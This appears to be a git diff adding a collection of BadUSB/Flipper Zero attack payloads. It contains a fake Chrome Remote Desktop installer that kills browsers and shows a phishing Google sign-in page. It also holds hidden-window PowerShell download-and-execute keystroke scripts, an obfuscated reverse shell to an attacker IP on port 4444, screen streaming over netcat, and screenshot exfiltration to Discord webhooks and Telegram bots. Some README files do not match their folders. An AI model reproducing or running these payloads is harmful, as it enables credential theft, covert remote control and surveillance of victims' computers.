+Add-Type -AssemblyName System.Drawing
+[System.Windows.Forms.Application]::EnableVisualStyles()
+
+$base64IconString = "iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAMAAACdt4HsAAABMlBMVEVHcExChfRChfRAm3jqQzVChfQ0qFNChfTxcyVChfVChfQ0qFPrRzPqQzU0qFMzp1bqQzU0qFM0qFM0plw0qFNChfQ0qFPqQzVChfRChfTqQzU0qFPqQzXqQzU0qFPqQzXqQzXqQzXqQzXrRDT7vAX8vAU1qFLqQjXqQzXqQzX8vQRAqU40qFNChfTqQzXqQzU0qFNChfT0uwj7vAU0qFM0qFPqQzX7vAU5m5BChfP7vAVChfT7vAXqQzU0qFPqQzVChfT7vAU0qFPqQzX7vAVBh+v7vAX7vAX7vAX1uAlChfT7vAW+th32lxRChfRChfRChfQ0qFNChfTqQzX7vAUyqFX+vARAi9o9krg2o2vRuBX6tQiltCbzgxztWixFqkx8rzf4pw1frUL2lhTrSzLwbyTRhUDUAAAAUXRSTlMA4R4G9SWqYQfoUOFL4lENcj3SZ/zy9/kP+j4cg9TvHbP9U8QZ8bsPpzQ6SHU/J2Uvzf16Jod2Tf5zubzVkH7uIWeTl936kp+GrY2OeHgwmKE8ZUQjAAAC40lEQVRYw82Wd3eaUBjGSTCogBiGGBEHmjiiUWPVxiwymu51BW1GmyZp8/2/QlUU4bL1tKfP8T94fr7zchHk/1UkVy00e6LYaxaEXDmoO0eK+ZgsKcr4p0ihWPGkkAvw38JJJqmYJCnJzKUQ8Wcn87Jiq1Ce9IGoVkKKo0KVqoe93IsproptutazkZcUD0kVl2oKGcWHio5pkDE/fiXUXNG/6dAKwa/fqX62+UvJpOTPX85bzHLxcrNAkoXmSVH29CM9qH9STBT0jperYsbDX4UKIIsNaLtE2c0fqUCtFuyGxNmPkOb5tx+2RsFxlSLvfvw2+gMfH7s76q973Z8P7Ec+qKr6+DzzZxqB/dvHY4B6p6WRbAY/Pl+21SlhmsYSCSBv1Zke75UQucT5fTgHqHfPxSUC2H6lLgifoIdbeNhROKo3UdfOLgRYXxs4an9rVsOFXz3eDgCIbmjvnBsAh5EAgMSe9s4LA+ANEgCQwq2A1/8UMMBXTGEOWLqI8xSWbmNqb8VBSny2jPKo/REG7EfNMgDW1uFlGrUfSnEzAD3bMOosnLKOsr7Oo9snwFPum9c3RPAVOlDU7z+HAMAhQMt5ZAD0TUfaqD31A551A+Ap6ypoh+ro9gEMJwDAtHwGoJdg2sjbp6l7olLauQKGAAbvjR8WLXxNHOZUBjw6sM0AQWr8wg84gNnHgJuG6mjL2G0MmFSirfZ4P2qa47DpaYswE7LdDjRQNHbwzTGAseqcmQCILq2XAk1TWBaAGwMhgcMBQklMomAu6lStRrFdjNDwN9c64AsKp9hhLISxi+N5Y2jDg6vZDJxZi0QTwFNDoBUiumfXJcoHQUsjEbafE3+E4fVV32lSacYPIeuybh2M87JzhOuJEa97pMFhLY+PfQvjXfwMG/e8LqC1ydTZ20/Tvm4cKH3BWMPIlti0/1tLutYtEdlZRTmeYDC2hQa8+aBpmmLrp6d1lqI7cWQVocjf1B+DjRopJPWlbAAAAABJRU5ErkJggg=="
+$iconimageBytes = [Convert]::FromBase64String($base64IconString)
+$ims = New-Object IO.MemoryStream($iconimageBytes, 0, $iconimageBytes.Length)
+$ims.Write($iconimageBytes, 0, $iconimageBytes.Length);
+$alkIcon = [System.Drawing.Image]::FromStream($ims, $true)
+
+$base64String = "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"
+$imageBytes = [System.Convert]::FromBase64String($base64String)
+$memoryStream = New-Object IO.MemoryStream($imageBytes, 0, $imageBytes.Length)
+$memoryStream.Write($imageBytes, 0, $imageBytes.Length);
+$image = [System.Drawing.Image]::FromStream($memoryStream)
+
+$setupwindow = New-Object System.Windows.Forms.Form
+$setupwindow.ClientSize = '600,450'
+$setupwindow.Text = "Chrome Remote Desktop Setup"
+$setupwindow.BackColor = "#ffffff"
+$setupwindow.Opacity = 1
+$setupwindow.TopMost = $true
+$setupwindow.Icon = [System.Drawing.Icon]::FromHandle((new-object System.Drawing.Bitmap -argument $ims).GetHIcon())
+$setupwindow.FormBorderStyle = 'FixedSingle'
+
+$nextbutton = New-Object System.Windows.Forms.Button
+$nextbutton.Text = "Next"
+$nextbutton.Width = 85
+$nextbutton.Height = 42
+$nextbutton.Location = New-Object System.Drawing.Point(490, 395)
+$nextbutton.Font = 'Open Sans,12'
+$nextbutton.BackColor = "#287ae6"
+$nextbutton.ForeColor = "#ffffff"
+
+$textfield = New-Object System.Windows.Forms.Label
+$textfield.Text = "Welcome to Google Remote Desktop Host"
+$textfield.ForeColor = "#000000"
+$textfield.AutoSize = $true
+$textfield.Location = New-Object System.Drawing.Point(145, 140)
+$textfield.Font = 'Microsoft Sans Serif,12'
+
+$infofield = New-Object System.Windows.Forms.Label
+$infofield.Text = "Remote access for your PC. Sign in with google to continue.."
+$infofield.ForeColor = "#000000"
+$infofield.AutoSize = $true
+$infofield.Location = New-Object System.Drawing.Point(120, 230)
+$infofield.Font = 'Microsoft Sans Serif,10'
+
+$infofield2 = New-Object System.Windows.Forms.Label
+$infofield2.Text = "Chrome will close and restart during installation"
+$infofield2.ForeColor = "#000000"
+$infofield2.AutoSize = $true
+$infofield2.Location = New-Object System.Drawing.Point(155, 260)
+$infofield2.Font = 'Microsoft Sans Serif,10'
+
+$linkfield = New-Object System.Windows.Forms.Label
+$linkfield.Text = "Sign in to your account"
+$linkfield.ForeColor = "#287ae6"
+$linkfield.AutoSize = $true
+$linkfield.Location = New-Object System.Drawing.Point(345, 407)
+$linkfield.Font = 'Microsoft Sans Serif,10'
+
+$pictureBox = New-Object System.Windows.Forms.PictureBox
+$pictureBox.Size = New-Object System.Drawing.Size(300, 300)
+$pictureBox.SizeMode = 'AutoSize'
+$pictureBox.Image = $image
+$pictureBox.Location = New-Object System.Drawing.Point(170, 50)
+
+$setupwindow.controls.AddRange(@($nextbutton,$linkfield,$textfield,$infofield,$infofield2,$pictureBox))
+
+$nextbutton.Add_Click({
+
+$setupwindow.Close()
+})
+
+
+[void]$setupwindow.ShowDialog()
+
+Start-Process -FilePath "taskkill" -ArgumentList "/F", "/IM", "chrome.exe" -NoNewWindow -Wait
+Start-Process -FilePath "taskkill" -ArgumentList "/F", "/IM", "msedge.exe" -NoNewWindow -Wait
+Sleep 1
+
+
+$htmlcode1 = @"
+
+
+
+
+
+
+ Sign in with Google
+
+
+
+
+
+
+
+
+
Sign in
+
Use your Google Account
+
+
+
+
+"@
+
+
+$htmlFile = "$env:temp\google.html"
+$htmlcode1 | Out-File $htmlFile -Force
+$webhk | Out-File $htmlFile -Append -Force
+$htmlcode2 | Out-File $htmlFile -Append -Force
+
+
+$screen = [System.Windows.Forms.Screen]::PrimaryScreen
+$screenWidth = $screen.WorkingArea.Width
+$screenHeight = $screen.WorkingArea.Height
+$left = ($screenWidth - $width) / 2
+$top = ($screenHeight - $height) / 2
+$chromePath = "C:\Program Files\Google\Chrome\Application\chrome.exe"
+$width = 530
+$height = 600
+
+$arguments = "--new-window --window-position=$left,$top --window-size=$width,$height --app=$htmlFile"
+$chromeProcess = Start-Process -FilePath $chromePath -ArgumentList $arguments -PassThru
+$chromeProcess.WaitForExit()
+
+sleep 2
+$outword = "No Logs"
+$outword | Out-File $htmlFile -Force
+sleep 1
diff --git a/LAN-Tools/LAN-Tools.txt b/LAN-Tools/LAN-Tools.txt
new file mode 100644
index 0000000..217209c
--- /dev/null
+++ b/LAN-Tools/LAN-Tools.txt
@@ -0,0 +1,15 @@
+REM Title: beigeworm's LAN Tools
+REM Author: @beigeworm
+REM Description: Start up a HTTP server and run a selection of Local Area Network Tools using Powershell.
+REM NOTE - This script will need Admin privileges to run properly.
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove "-W H" to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/Posh-LAN/main/Posh-LAN-Tools.ps1 | iex
+ENTER
+
diff --git a/LAN-Tools/README.md b/LAN-Tools/README.md
new file mode 100644
index 0000000..3c2083f
--- /dev/null
+++ b/LAN-Tools/README.md
@@ -0,0 +1,17 @@
+
+
Beigeworm's Powershell LAN Toolset
+
+MAIN SCRIPT HERE - https://github.com/beigeworm/Posh-LAN
+
+SYNOPSIS
+
+Start up a HTTP server and run a selection of Local Area Network Tools using Powershell.
+
+USAGE
+
+1. Run this script on target computer and note the URL provided
+2. on another device on the same network, enter the provided URL in a browser window
+
+NOTE
+
+This script will need Admin privaleges to run properly.
diff --git a/Mouse-Monitor-to-Discord/Mouse-Activity-to-Discord.txt b/Mouse-Monitor-to-Discord/Mouse-Activity-to-Discord.txt
new file mode 100644
index 0000000..458d23b
--- /dev/null
+++ b/Mouse-Monitor-to-Discord/Mouse-Activity-to-Discord.txt
@@ -0,0 +1,20 @@
+
+REM Title: beigeworm's monitor mouse activity to Discord Webhook.
+REM Author: @beigeworm
+REM Description: This script monitors mouse activity and posts results to a discord webhook.
+REM Target: Windows 10
+
+REM *SETUP*
+REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove -W Hidden to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_mm_to_dc | iex
+ENTER
+
+
diff --git a/Mouse-Monitor-to-Discord/README.md b/Mouse-Monitor-to-Discord/README.md
new file mode 100644
index 0000000..92040bf
--- /dev/null
+++ b/Mouse-Monitor-to-Discord/README.md
@@ -0,0 +1,11 @@
+
+
+
+SYNOPSIS
+
+Opens a netcat connection to a Windows machine in Powershell
+
+USAGE
+
+1. Download Ncat For windows. https://nmap.org/download#windows
+2. Change "YOUR IP HERE" to the attacker machine's ipv4 address (find using ipconfig on windows)
+3. Open a terminal on the attacker machine and type "nc -lvp 4444"
+4. Run this script on the client machine.
+
+NOTE
+
+The PORT number is 4444
\ No newline at end of file
diff --git a/Netcat-Client/Simple-Netcat-Client.txt b/Netcat-Client/Simple-Netcat-Client.txt
new file mode 100644
index 0000000..451da8c
--- /dev/null
+++ b/Netcat-Client/Simple-Netcat-Client.txt
@@ -0,0 +1,20 @@
+
+REM Title: Beigeworm's Simple Netcat Client
+REM Author: @beigeworm
+REM Description: This script connects target computer with a netcat session to send powershell commands.
+REM Target: Windows 10
+
+REM *SETUP*
+REM replace IP_HERE with your netcat attacker IP Address.
+REM NOTE The PORT number is 4444
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove "-W H" to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -NoP -Ep Bypass -W H -C $ip='IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Netcat-Client/main.ps1 | iex
+ENTER
+
diff --git a/Netcat-Client/main.ps1 b/Netcat-Client/main.ps1
new file mode 100644
index 0000000..4bf592f
--- /dev/null
+++ b/Netcat-Client/main.ps1
@@ -0,0 +1,14 @@
+
+do{
+$v = 4
+$a = New-Object S`ySt`em.N`eT.`s`ock`eTs.TC`PC`li`eNt("$ip",4444)
+$b = $a.GetStream();[byte[]]$c = 0..65535|%{0}
+while(($d = $b.Read($c, 0, $c.Length)) -ne 0){
+$e = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($c,0, $d)
+$f = (iex $e 2>&1 | Out-String );$g = $f + (pwd).Path + '> '
+$h = ([text.encoding]::ASCII).GetBytes($g)
+$b.Write($h,0,$h.Length)
+$b.Flush()}
+$a.Close()
+Sleep 10
+}while ($v -le 5)
diff --git a/Netcat-Screenshare/Desktop Screenshare over Netcat.txt b/Netcat-Screenshare/Desktop Screenshare over Netcat.txt
new file mode 100644
index 0000000..4b721ce
--- /dev/null
+++ b/Netcat-Screenshare/Desktop Screenshare over Netcat.txt
@@ -0,0 +1,20 @@
+REM Title: Beigeworm's Screenshare Through Netcat
+REM Author: @beigeworm
+REM Description: This script connects target computer with a netcat session to send a stream of the desktop to a browser window.
+REM Target: Windows 10
+
+REM *SETUP*
+REM replace YOUR_IP_HERE with your netcat attacker IP Address.
+REM Run script on target Windows system.
+REM On a Linux box use this command > nc -lvnp 9000 | nc -lvnp 8080 (Netcat is required)
+REM Then in a firefox browser on the Linux box > http://localhost:8080
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove "-W H" to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -NoP -Ep Bypass -W H -C $ip='YOUR_IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Netcat-Screenshare/main.ps1 | iex
+ENTER
diff --git a/Netcat-Screenshare/README.md b/Netcat-Screenshare/README.md
new file mode 100644
index 0000000..084db6c
--- /dev/null
+++ b/Netcat-Screenshare/README.md
@@ -0,0 +1,14 @@
+
+
Desktop Screensahre Over Netcat
+
+SYNOPSIS
+
+Starts a video stream of the desktop to a netcat session (the output is viewed in a browser.)
+
+USAGE
+
+Run script on target Windows system.
+On a Linux box use this command > nc -lvnp 9000 | nc -lvnp 8080
+Then in a firefox browser goto > http://localhost:8080
+
+(Firefox is the only browser that supports the codec for the video stream..)
\ No newline at end of file
diff --git a/Netcat-Screenshare/main.ps1 b/Netcat-Screenshare/main.ps1
new file mode 100644
index 0000000..5637ccb
--- /dev/null
+++ b/Netcat-Screenshare/main.ps1
@@ -0,0 +1,45 @@
+$IP = "$ip"
+$PORT = "9000"
+
+while ($true){
+try{
+ Add-Type -AssemblyName System.Windows.Forms
+ [System.IO.MemoryStream] $MemoryStream = New-Object System.IO.MemoryStream
+ $socket = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)
+ $socket.Connect($IP,$PORT)
+
+ function SendResponse($sock, $string){
+ if ($sock.Connected){
+ $bytesSent = $sock.Send($string)
+ if ( $bytesSent -eq -1 ){}}}
+
+ function SendStrResponse($sock, $string){
+ if ($sock.Connected){
+ $bytesSent = $sock.Send(
+ [text.Encoding]::Ascii.GetBytes($string))
+ if ( $bytesSent -eq -1 ){}}}
+
+ function SendHeader([net.sockets.socket] $sock,$length,$statusCode = "200 OK",$mimeHeader="text/html",$httpVersion="HTTP/1.1"){
+ $response = "HTTP/1.1 $statusCode`r`n" + "Content-Type: multipart/x-mixed-replace; boundary=--boundary`r`n`n"
+ SendStrResponse $sock $response}
+ SendHeader $socket
+
+ while ($True){
+ $b = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height)
+ $g = [System.Drawing.Graphics]::FromImage($b)
+ $g.CopyFromScreen((New-Object System.Drawing.Point(0,0)), (New-Object System.Drawing.Point(0,0)), $b.Size)
+ $g.Dispose()
+ $MemoryStream.SetLength(0)
+ $b.Save($MemoryStream, ([system.drawing.imaging.imageformat]::jpeg))
+ $b.Dispose()
+ $length = $MemoryStream.Length
+ [byte[]] $Bytes = $MemoryStream.ToArray()
+ $str = "`n`n--boundary`n" +
+ "Content-Type: image/jpeg`n" +
+ "Content-Length: $length`n`n"
+ SendStrResponse $socket $str
+ SendResponse $socket $Bytes
+ }
+$MemoryStream.Close()
+}catch{Write-Error $_}}
+
diff --git a/Network-Enumeration-GUI/Network-Enumeration-GUI.txt b/Network-Enumeration-GUI/Network-Enumeration-GUI.txt
new file mode 100644
index 0000000..551e17a
--- /dev/null
+++ b/Network-Enumeration-GUI/Network-Enumeration-GUI.txt
@@ -0,0 +1,16 @@
+REM Title: beigeworm's LAN Device Enumeration GUI Tool.
+REM Author: @beigeworm
+REM Description: This script creates a GUI for enumerating devices on the local network.
+REM Target: Windows 10
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove "-W H" to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Network-Enumeration-GUI/main.ps1 | iex
+ENTER
+
+
diff --git a/Network-Enumeration-GUI/README.md b/Network-Enumeration-GUI/README.md
new file mode 100644
index 0000000..3fe4042
--- /dev/null
+++ b/Network-Enumeration-GUI/README.md
@@ -0,0 +1,6 @@
+
+
+
+SYNOPSIS
+
+Takes a screenshot of the desktop and posts to a discord webhook.
+
+SETUP
+
+1. replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
diff --git a/Screen-to-Discord/Screenshot-to-Discord.txt b/Screen-to-Discord/Screenshot-to-Discord.txt
new file mode 100644
index 0000000..bd9ef50
--- /dev/null
+++ b/Screen-to-Discord/Screenshot-to-Discord.txt
@@ -0,0 +1,20 @@
+
+REM Title: Screenshot to discord webhook
+REM Author: @beigeworm
+REM Description: This script takes a screenshot of the desktop and posts to a discord webhook.
+REM Target: Windows 10
+
+REM *SETUP*
+REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove "-W H" to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_sc_to_dc | iex
+ENTER
+
+
diff --git a/Screen-to-Discord/main.ps1 b/Screen-to-Discord/main.ps1
new file mode 100644
index 0000000..9164f5b
--- /dev/null
+++ b/Screen-to-Discord/main.ps1
@@ -0,0 +1,24 @@
+$hookurl = "$dc"
+$seconds = 30 # Screenshot interval
+$a = 1 # Sceenshot amount
+
+While ($a -gt 0){
+$Filett = "$env:temp\SC.png"
+Add-Type -AssemblyName System.Windows.Forms
+Add-type -AssemblyName System.Drawing
+$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
+$Width = $Screen.Width
+$Height = $Screen.Height
+$Left = $Screen.Left
+$Top = $Screen.Top
+$bitmap = New-Object System.Drawing.Bitmap $Width, $Height
+$graphic = [System.Drawing.Graphics]::FromImage($bitmap)
+$graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
+$bitmap.Save($Filett, [System.Drawing.Imaging.ImageFormat]::png)
+Start-Sleep 1
+curl.exe -F "file1=@$filett" $hookurl
+Start-Sleep 1
+Remove-Item -Path $filett
+Start-Sleep $seconds
+$a--
+}
diff --git a/Screen-to-Telegram/README.md b/Screen-to-Telegram/README.md
new file mode 100644
index 0000000..c757880
--- /dev/null
+++ b/Screen-to-Telegram/README.md
@@ -0,0 +1,10 @@
+
+
Screenshot to Telegram
+
+SYNOPSIS
+
+Takes a screenshot of the desktop and posts to a Telegram bot chat.
+
+SETUP
+
+1. replace TELEGRAM_TOKEN_HERE with your Telegram token.
diff --git a/Screen-to-Telegram/Screenshot-to-Telegram.txt b/Screen-to-Telegram/Screenshot-to-Telegram.txt
new file mode 100644
index 0000000..1e17d0d
--- /dev/null
+++ b/Screen-to-Telegram/Screenshot-to-Telegram.txt
@@ -0,0 +1,20 @@
+
+REM Title: Screenshot to Telegram Bot Chat
+REM Author: @beigeworm
+REM Description: This script takes a screenshot of the desktop and posts to a Telegram Bot Chat.
+REM Target: Windows 10
+
+REM *SETUP*
+REM replace TELEGRAM_TOKEN_HERE with your Telegram Token.
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove "-W H" to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -NoP -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN_HERE'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Screen-to-Telegram/main.ps1 | iex
+ENTER
+
+
diff --git a/Screen-to-Telegram/main.ps1 b/Screen-to-Telegram/main.ps1
new file mode 100644
index 0000000..d23605a
--- /dev/null
+++ b/Screen-to-Telegram/main.ps1
@@ -0,0 +1,31 @@
+
+$seconds = 30 # Screenshot interval
+$a = 1 # Sceenshot amount
+
+$Token = "$tg"
+$URL='https://api.telegram.org/bot{0}' -f $Token
+while($chatID.length -eq 0){
+$updates = Invoke-RestMethod -Uri ($url + "/getUpdates")
+if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1]
+if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}}
+Sleep 10
+}
+
+While ($a -gt 0){
+
+Add-Type -AssemblyName System.Windows.Forms
+$screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
+$bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height
+$graphics = [System.Drawing.Graphics]::FromImage($bitmap)
+$graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $screen.Size)
+$filePath = "$env:temp\sc.png"
+$bitmap.Save($filePath, [System.Drawing.Imaging.ImageFormat]::Png)
+$graphics.Dispose()
+$bitmap.Dispose()
+
+curl.exe -F chat_id="$ChatID" -F document=@"$filePath" "https://api.telegram.org/bot$Token/sendDocument" | Out-Null
+Remove-Item -Path $filePath
+
+Start-Sleep $seconds
+$a--
+}
diff --git a/Shortcut-Spam/Desktop-Shortcut-Spam.txt b/Shortcut-Spam/Desktop-Shortcut-Spam.txt
new file mode 100644
index 0000000..7705b04
--- /dev/null
+++ b/Shortcut-Spam/Desktop-Shortcut-Spam.txt
@@ -0,0 +1,16 @@
+REM Title: beigeworm's Desktop Shortcut Spammer.
+REM Author: @beigeworm
+REM Description: This script creates 100 shortcuts on the users Desktop.
+REM Target: Windows 10
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove "-W H" to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Shortcut-Spam/main.ps1 | iex
+ENTER
+
+
diff --git a/Shortcut-Spam/README.md b/Shortcut-Spam/README.md
new file mode 100644
index 0000000..4bc44ad
--- /dev/null
+++ b/Shortcut-Spam/README.md
@@ -0,0 +1,12 @@
+
+
Simple Shortcut Bomb
+
+
+SYNOPSIS
+
+This script will create 200 shortcuts on the desktop very quickly.
+
+USAGE
+
+1. Change '100' to the number of shortcuts you want created
+2. Run the script.
\ No newline at end of file
diff --git a/Shortcut-Spam/main.ps1 b/Shortcut-Spam/main.ps1
new file mode 100644
index 0000000..11b9deb
--- /dev/null
+++ b/Shortcut-Spam/main.ps1
@@ -0,0 +1,18 @@
+$n = 100
+$i = 0
+
+while($i -lt $n)
+{
+$num = Get-Random
+$Location = "C:\Windows\System32\rundll32.exe"
+$WshShell = New-Object -ComObject WScript.Shell
+$Shortcut = $WshShell.CreateShortcut("$Home\Desktop\USB Hardware" + $num + ".lnk")
+$Shortcut.TargetPath = $Location
+$Shortcut.Arguments ="shell32.dll,Control_RunDLL hotplug.dll"
+$Shortcut.IconLocation = "hotplug.dll,0"
+$Shortcut.Description ="Device Removal"
+$Shortcut.WorkingDirectory ="C:\Windows\System32"
+$Shortcut.Save()
+Start-Sleep -Milliseconds 10
+$i++
+}
diff --git a/Social-Search-GUI/README.md b/Social-Search-GUI/README.md
new file mode 100644
index 0000000..d55a5bb
--- /dev/null
+++ b/Social-Search-GUI/README.md
@@ -0,0 +1,12 @@
+
+
Social Search GUI
+
+SYNOPSIS
+
+This script presents a GUI for searching popular websites with a single username..
+
+USAGE
+
+1. Run script with powershell
+2. Input your desired username
+3. Press "Start Search"
diff --git a/Social-Search-GUI/Username-Search-GUI.txt b/Social-Search-GUI/Username-Search-GUI.txt
new file mode 100644
index 0000000..b64367f
--- /dev/null
+++ b/Social-Search-GUI/Username-Search-GUI.txt
@@ -0,0 +1,16 @@
+REM Title: beigeworm's Username Search GUI Tool.
+REM Author: @beigeworm
+REM Description: This script creates a GUI for searching social media and other sites with a specified Username.
+REM Target: Windows 10
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove "-W H" to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Social-Search-GUI/main.ps1 | iex
+ENTER
+
+
diff --git a/Social-Search-GUI/main.ps1 b/Social-Search-GUI/main.ps1
new file mode 100644
index 0000000..821e63f
--- /dev/null
+++ b/Social-Search-GUI/main.ps1
@@ -0,0 +1,299 @@
+Add-Type -AssemblyName System.Windows.Forms
+Add-Type -AssemblyName System.Drawing
+Add-Type -AssemblyName Microsoft.VisualBasic
